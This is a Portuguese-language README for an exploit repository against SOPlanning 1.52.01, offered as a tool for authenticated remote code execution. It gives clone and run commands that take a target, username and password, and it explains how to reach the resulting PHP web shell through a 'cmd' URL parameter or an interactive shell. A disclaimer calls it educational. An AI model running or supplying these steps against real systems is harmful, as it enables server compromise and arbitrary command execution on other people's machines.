
Exploit Para SOPlanning 1.52.01 (Ferramenta Simples de Planejamento Online) - Execução Remota de Código (RCE) (Autenticado)
Este repositório contém um exploit para uma vulnerabilidade de Execução Remota de Código (RCE) no SOPlanning versão 1.52.01. O exploit permite que usuários autenticados carreguem um arquivo PHP malicioso e executem comandos arbitrários no servidor.
requests (Instale com pip install requests)Clone este repositório:
git clone https://github.com/TheExploiters/SOPlanning-RCE-1.52.01.git
cd SOPlanning-RCE-1.52.01
Execute o script do exploit:
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <alvo> -u <usuário> -p <senha>
Substitua http://example.com:9090 pela URL do alvo, admin pelo nome de usuário e admin pela senha.
Após a execução bem-sucedida, acesse o web shell:
Acesse o webshell aqui: http://example.com/upload/files/{link_id}/{php_filename}?cmd=<comando>
Para usar o shell interativo, responda com yes quando solicitado.
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <alvo> -u <usuário> -p <senha>
Este exploit foi criado por Ardayfio Samuel Nii Aryee e é fornecido apenas para fins educacionais. O autor e o proprietário do repositório não são responsáveis por qualquer uso indevido ou dano causado. Certifique-se de ter permissão explícita antes de testar este exploit em qualquer sistema.